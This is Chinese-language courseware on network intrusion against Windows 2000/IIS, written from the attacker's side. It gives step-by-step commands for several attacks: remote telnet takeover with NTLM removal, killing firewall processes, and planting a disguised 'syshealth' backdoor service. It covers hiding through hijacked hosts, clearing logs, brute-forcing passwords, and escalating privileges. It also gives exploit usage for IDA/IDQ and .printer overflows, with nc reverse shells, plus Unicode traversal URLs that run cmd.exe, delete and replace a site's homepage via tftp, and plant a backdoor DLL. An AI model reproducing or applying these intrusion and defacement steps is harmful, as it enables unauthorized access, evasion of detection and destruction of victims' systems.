网络入侵初步课件

1、网络入侵初步远程控制计算机telnet是控制主机的第一手段入侵者在远程主机上执行命令，可以通过建立IPC$连接，然后使用net time命令查看系统时间，最后使用at 命令建立计划任务，完成远程执行命令。telnet方式对入侵者而言则会方便得多，入侵一旦与远程主机建立telnet连接，就可以控制本地计算机一样来控制远程计算机。使用telnet登录telnet host port成功建立telnet连接，除了要求掌握远程计算机上的账号和密码外，还需要远程计算机已经开启telnet服务，并去除NTLM验证。telnet入侵步骤1、开启远程主机telnet服务2、去掉NTLM验证3、telnet连接

2、通过”bat文件”和”计划任务服务”开启远程主机telnet服务/*start.batnet start telnet/*stop.batnet stop telnet开启远程主机telnet服务后，如果没有去掉NTLM验证，在登录时会失败。解决方法一1）在本地计算机上建立一个与远程主机上相同的账号2）通过“开始”“程序” “附件”找到“命令提示符”，使用右键单击“命令提示符”，然后选择“属性”，打开如下对话框3）选中对话框中“以其他用户身份运行”4）打开“命令提示符”，输入用户名和密码，单击确定按钮后，得到MS-DOS界面5）在MS-DOS界面上输入telnet 便可连接上telnet服务解

3、决方法二）使用工具NTLM.exe去除NTLM验证。首先与远程主机建立IPC$连接，然后将NTLM.exe复制到远程主机，最后通过at命令使远程计算机执行NTLM.exe。）在MS-DOS界面上输入telnet 便可连接上telnet服务telnet杀手锏opentelnet开启远程主机telnet服务，并解除NTLM验证opentelnet serverIP telnet高级入侵采用的工具：Opentelnetaproman: 用来查看进程、杀死进程instsrv:用来给主机安装服务aproman简介：以命令行方式查看进程、杀死进程，使用方法：aproman a 显示所有进程aproman

4、t pid 杀死指定进程号的进程instsrv简介:用命令行方式安装、卸载服务的程序，使用方法：instsrv instsrv REMOVE第一步：用opentelnet打开远程主机telnet服务、修改主机端口、去除NTLM验证Opentelnet 66第二步：把所需文件(instsrv.exe,aproman.exe)复制到远程主机第三步：telnet登录telnet 66第四步：用aproman杀死防火墙进程第五步：安装更为隐蔽的telnet服务instsrv syshealth c:winntsystem32tlntsvr.exe一个名为”syshealth”的服务建立成功，从表面上看

5、该服务与远程telnet服务不存在任何关系，但是实际上是入侵者留下的telnet后门服务。即使远程主机上的telnet服务已被停止并禁用，但入侵者仍然能够通过telnet来控制远程主机。 远程执行命令工具psexec computer -u user -p psswd cmd-u 登录用户名-p 密码cmd 执行的命令例：psexec -u administrator -p hziee123 c:aproman apsexec -u administrator -p hziee123 cmd.exe 远程执行命令方法汇总通过建立计划任务执行通过telnet执行通过psexec工具执行攻击五部曲

6、一次成功的攻击，都可以归纳成基本的五步骤，但是根据实际情况可以随时调整。归纳起来就是“黑客攻击五部曲” 1、隐藏IP2、踩点扫描3、获得系统或管理员权限4、种植后门5、在网络中隐身1、隐藏IP这一步必须做，因为如果自己的入侵的痕迹被发现了，当FBI找上门的时候就一切都晚了。通常有两种方法实现自己IP的隐藏：第一种方法是首先入侵互联网上的一台电脑（俗称“肉鸡”），利用这台电脑进行攻击，这样即使被发现了，也是“肉鸡”的IP地址。第二种方式是做多级跳板“Sock代理”，这样在入侵的电脑上留下的是代理计算机的IP地址。比如攻击A国的站点，一般选择离A国很远的B国计算机作为“肉鸡”或者“代理”，这样跨国

7、度的攻击，一般很难被侦破。2、踩点扫描踩点就是通过各种途径对所要攻击的目标进行多方面的了解（包括任何可得到的蛛丝马迹，但要确保信息的准确），确定攻击的时间和地点。扫描的目的是利用各种工具在攻击目标的IP地址或地址段的主机上寻找漏洞。扫描分成两种策略：被动式策略和主动式策略。3、获得系统或管理员权限得到管理员权限的目的是连接到远程计算机，对其进行控制，达到自己攻击目的。获得系统及管理员权限的方法有：通过系统漏洞获得系统权限通过管理漏洞获得管理员权限通过软件漏洞得到系统权限通过监听获得敏感信息进一步获得相应权限通过弱口令获得远程管理员的用户密码通过穷举法获得远程管理员的用户密码通过攻破与目标机有信

8、任关系另一台机器进而得到目标机的控制权通过欺骗获得权限以及其他有效的方法。4、种植后门 为了保持长期对自己胜利果实的访问权,在已经攻破的计算机上种植一些供自己访问的后门。5、在网络中隐身一次成功入侵之后，一般在对方的计算机上已经存储了相关的登录日志，这样就容易被管理员发现。入侵完毕后需要清除登录日志已经其他相关的日志。网络扫描 黑客攻击五部曲中第二步踩点扫描中的扫描，一般分成两种策略:一种是主动式策略另一种是被动式策略。网络扫描概述 被动式策略就是基于主机之上，对系统中不合适的设置，脆弱的口令以及其他同安全规则抵触的对象进行检查。主动式策略是基于网络的，它通过执行一些脚本文件模拟对系统进行攻击

9、的行为并记录系统的反应，从而发现其中的漏洞。扫描的目的就是利用各种工具对攻击目标的IP地址或地址段的主机查找漏洞。扫描采取模拟攻击的形式对目标可能存在的已知安全漏洞逐项进行检查，目标可以是工作站、服务器、交换机、路由器和数据库应用等。根据扫描结果向扫描者或管理员提供周密可靠的分析报告。系统用户扫描可以使用工具软件：GetNTUser，该工具可以在Winnt4以及Win2000操作系统上使用，主要功能包括：（1）扫描出NT主机上存在的用户名。（2）自动猜测空密码和与用户名相同的密码。（3）可以使用指定密码字典猜测密码。（4）可以使用指定字符来穷举猜测密码。扫描例如对IP为的计算机进行扫描，首先将

10、该计算机添加到扫描列表中，选择菜单File下的菜单项“添加主机”，输入目标计算机的IP地址，可以得到对方的用户列表了。点击工具栏上的图标，得到的用户列表。开放端口扫描 得到对方开放了哪些端口也是扫描的重要一步。使用工具软件PortScan可以到得到对方计算机都开放了哪些端口，主界面如图所示。 端口扫描对的计算机进行端口扫描，在Scan文本框中输入IP地址，点击按钮“START”，开始扫描如图所示。共享目录扫描通过工具软件Shed来扫描对方主机，得到对方计算机提供了哪些目录共享。工具软件的主界面如图所示。扫描一个IP地址段该软件可以扫描一个IP地址段的共享信息，这里只扫描IP为的目录共享情况。在

11、起始IP框和终止IP框中都输入，点击按钮“开始”就可以得到对方的共享目录了。漏洞扫描 使用工具软件X-Scan-v2.3该软件的系统要求为：Windows 9x/NT4/2000。该软件采用多线程方式对指定IP地址段(（或单机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式扫描内容包括：远程操作系统类型及版本标准端口状态及端口Banner信息SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SSL漏洞SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVERNT-SERVER弱口令用户，NT服务器NETBIOS信息注册表信息等。主界面扫描结果

12、保存在/log/目录中，index_*.htm为扫描结果索引文件。扫描参数可以利用该软件对系统存在的一些漏洞进行扫描，选择菜单栏设置下的菜单项“扫描模块”，扫描模块的设置如图所示。扫描参数下面需要确定要扫描主机的IP地址或者IP地址段，选择菜单栏设置下的菜单项“扫描参数”漏洞扫描设置完毕后，进行漏洞扫描，点击工具栏上的图标“开始”，开始对目标主机进行扫描，如图所示。获得系统或管理员权限介绍目前常用的网络攻击手段：社会工程学攻击物理攻击暴力攻击利用Unicode漏洞攻击利用缓冲区溢出漏洞进行攻击等技术。结合实际，介绍流行的攻击工具的使用。 社会工程学攻击 社交工程是使用计谋和假情报去获得密码和其

13、他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些学生说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。物理攻击与防范 物理安全是保护一些比较重要的设备不被接触。物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。 得到管理员密码 用户登录以

14、后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，可以利用程序将当前登录用户的密码解码出来，如图所示。得到管理员密码使用FindPass等工具可以对该进程进行解码，然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录，执行该程序，将得到当前用户得登录名，如图所示。权限提升有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。其实不然，用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。普通用户建立管理员帐号利用a1帐户登录系统，在系统中执行程序GetAdmin.

15、exe，程序自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名。普通用户建立管理员帐号输入一个用户名“a6”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口，如图所示。暴力攻击字典攻击是最常见的一种暴力攻击，如果黑客通过使用传统的暴力攻击方法去获得密码的话，将不得不尝试每种可能的字符和组合。字典攻击则通过使用某种具体的密码来缩小尝试的范围。字典文件 一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以

16、作为字典文件的一部分，这样可以大大的提高破解效率。一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件，下面是一个简单的字典文件。暴力破解操作系统密码 暴力破解操作系统密码 比如使用字典文件，利用工具软件GetNTUser可以将管理员密码破解出来，。设置密码字典选择菜单栏工具下的菜单项“设置”，设置密码字典为一个文本文件。进行系统破解利用密码字典中的密码进行系统破解，选择菜单栏工具下的菜单项“字典测试”，程序将按照字典的设置进行逐一的匹配。暴力破解软件密码 目前许多软件都具有加密的功能，比如Office文档、Winzip文档和Winra

17、r文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解。Office文档暴力破解 修改权限密码在对话框中选择选项卡“安全性”，在打开权限密码和修改权限密码的两个文本框中都输入“315315”，如图所示。输入密码保存并关闭该文档，然后再打开，就需要输入密码了，如图所示。破解Word文档密码该密码是三位的，使用工具软件，Advanced Office XP Password Recovery可以快速破解Word文档密码，主界面如图所示。基于漏洞的入侵任何系统都不是完善的，在设计和实现上总是存在或多或少的缺陷，如果能够找到这些缺陷，并巧妙进行利用，便可

18、绕过系统的认证直接进入系统内部，这就是基于漏洞的入侵，也称为exploit针对X-Scan的漏洞扫描结果进行攻击（1）.ida&.idq漏洞（2）Unicode目录遍历漏洞（3）RPC漏洞（4）.printer漏洞.ida&.idq漏洞微软IIS默认安装情况下带了一个索引服务器（Index Server，在Windows 2000下为Index Service）。默认安装时，IIS支持两种脚本映射：管理脚本（.ida文件）、Internet数据查询脚本（.idq文件）。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。idq.dll实现上存在一个缓冲区溢出漏洞，远程攻击者可以利

19、用此漏洞通过溢出攻击以“Local System”的权限在主机上执行任意指令。由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区，如果攻击者提供一个特殊格式的URL，就可能引发一个缓冲区溢出。通过精心构造发送数据，攻击者可以改变程序执行流程，以“Local System”的权限执行任意代码。受影响系统：Microsoft IIS 4.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP

20、4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 Microsoft IIS 5.0 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Professional SP2 - Microsoft Wi

21、ndows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Micro

22、soft Windows 2000 Advanced Server.ida&.idq漏洞利用.ida入侵实例1)idahack简介。idahack是基于命令行的溢出工具，当远程服务器溢出后，便会在指定端口得到一个telnet权限。2)命令格式：idahack 入侵思路：扫描远程服务器、ida溢出、telnet登录、建立账号、退出登录1)扫描远程服务器，确认远程服务器存在ida漏洞2) ida溢出,idahack 80 1 5203) telnet登录,telnet 5204)建立用户账号 5)退出登录 exit.idq入侵实例利用Snake编写的IISIDQ溢出工具，在远程服务器溢出后，有两种

23、登录方式供选择，(一) 在漏洞溢出后， IISIDQ自动打开远程服务器的指定端口并等待连接，这时，采用nc工具远程连接服务器。(二)在远程服务器溢出以后， IISIDQ 会让远程服务器主去连接入侵者所指定IP地址，这种连接方式使入侵者能够穿透一些网络防火墙。入侵(一)第一步：IISIDQ溢出工具，该软件适用于各种类型的操作系统，比如对进行攻击，的操作系统的Windows 2000，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行cmd.exe命令。点击按钮“IDQ溢出”，出现攻击成功的提示框。第二步：这个时候，813端口已经开放，利用工具软件nc.exe连接到该端口，使用

24、的语法是：nc.exe 813nc.exe 是入侵者常用来连接远程服务器的工具之一，nc常有两种方法进行连接1)主动连接到外部：nc host port2)监听以等待外部连接：nc l p port第三步：建立后门账号第四步：使用exit断开连接入侵(二)第一步：使用nc.exe在本地打开端口等待连接。第二步：本地的IP地址是，要攻击的计算机的IP地址是，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813，设置好以后，点击按钮“IDQ溢出”,查看nc命令的DOS框，nc连接上远程主机了。第三步：建立后门账号第四步：使用exit断开连接.printer 漏洞微软Win 2K IIS 5

25、的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系，缺省情况下该映射存在。当远程用户提交对.printer的URL请求时，IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer的URL请求，在msw3prt.dll中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，WEB服务停止响应，Win 2K可以检查到WEB服务停止响应，从而自动重启它，因此系统管理员很难意识到发生过攻击。受影响系统： Microsoft Windows 2000 Server Micr

26、osoft Windows 2000 Datacenter Server Microsoft Windows 2000 Advanced Server.printer 漏洞攻击 使用工具软件：cniis.exe，使用的语法格式是：“cniis 0”，第一个参数是目标的IP地址，第二参数是目标操作系统的补丁号，因为没有打补丁，这里就是0。执行完后，将会在目标主机上建立一个用户名和密码都是hax的用户.Unicode漏洞微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，

27、它会对其进行解码，从而利用扩展UNICODE字符取代“/”和“”而能利用“./”遍历远程主机目录。这样一来，入侵者就可以通过该方法操作该服务器上的磁盘文件，可以新建、执行、下载、甚至删除磁盘实现unicode编码入侵的关键是构造”/”和”字符让远程服务器执行，可以通过下面编码来构造”/”和”字符。%c1%1c - /%c0%2f - 在IE的地址栏中输入/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:，与远程服务器连接后，如果得到回显，就说明该服务器存在unicode目录遍历漏洞。scripts 为远程服务器上的脚本文件目录 .%c1%1c.

28、 是关键的一个参数，被远程服务器译为./.cmd.exe?/c+ 打开远程服务器中的cmd.exedir+c: 是入侵者要执行的命令利用unicode漏洞，入侵者能把IE变成了远程执行命令的控制台。Unicode漏洞的检测方法在Windows的目录结构中，可以使用两个点和一个斜线“./”来访问上一级目录，在浏览器中利用“scripts/././”可以访问到系统盘根目录，访问“scripts/././winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。浏览器地址栏中禁用符号“./”

29、，但是可以使用符号“/”的Unicode的编码。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。Unicode漏洞此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、

30、韩文版等操作系统。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af利用Unicode漏洞读取系统盘目录 拷贝文件为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是：/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe查看C盘的目录以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：/scripts/c.exe?/c+dir+c:利用Unicode漏洞更改主页第一步：确定对方网站的根路径在“C:In

31、etpubwwwroot”（系统默认）下，可以删除该路径下的文件“default.html”来删除主页，这里的“default.html”文件是IIS的默认启动页面。使用的语句是：/scripts/c.exe?/c+del+c:inetpubwwwrootdefault.html利用Unicode漏洞更改主页利用Unicode漏洞更改主页第二步：利用本机TFTP服务器，让远程主机下载更改后的主页。1）首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传输单个文件。2）使用工具软件tftpd32.exe建立

32、TFTP服务器。3）使用tftp命令把本机上的主页传到远程主机上“/scripts/c.exe?/c+tftp+-i+get+default.html+c:inetpubwwwrootdefault.html”，tftp命令是windows自带的命令，专门用来从tftp服务器上传和下载文件，使用方法如下：tftp -i host GET|PUT source dest-i 二进制文件传输GET 下载文件PUT 上传文件 利用Unicode漏洞入侵系统 在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode漏洞，手工为远程服务器添加新的漏洞，从而可以入侵对方的系

33、统，并得到管理员权限。一般情况下，用户通过IE运行远程服务器的文件一般是以IUSR_machinename帐号方式运行的，所以得到的权限较低，但调用下面文件时，将得到系统管理员权限，所以可以制作一个后门程序，这个后门程序用下面文件名。 1idq.dll， 2 httpext.dll，3 httpodbc.dll， 4 ssinc.dll5 msw3prt.dll， 6 author.dll， 7 admin.dll， 8 shtml.dll9 sspifilt.dll， 10 compfilt.dll， 11 pwsdata.dll12md5filt.dll， 13fpexedll.dll第一步：制作后门程序，文件名为idq.dll第二步：在本机上建立TFTP服务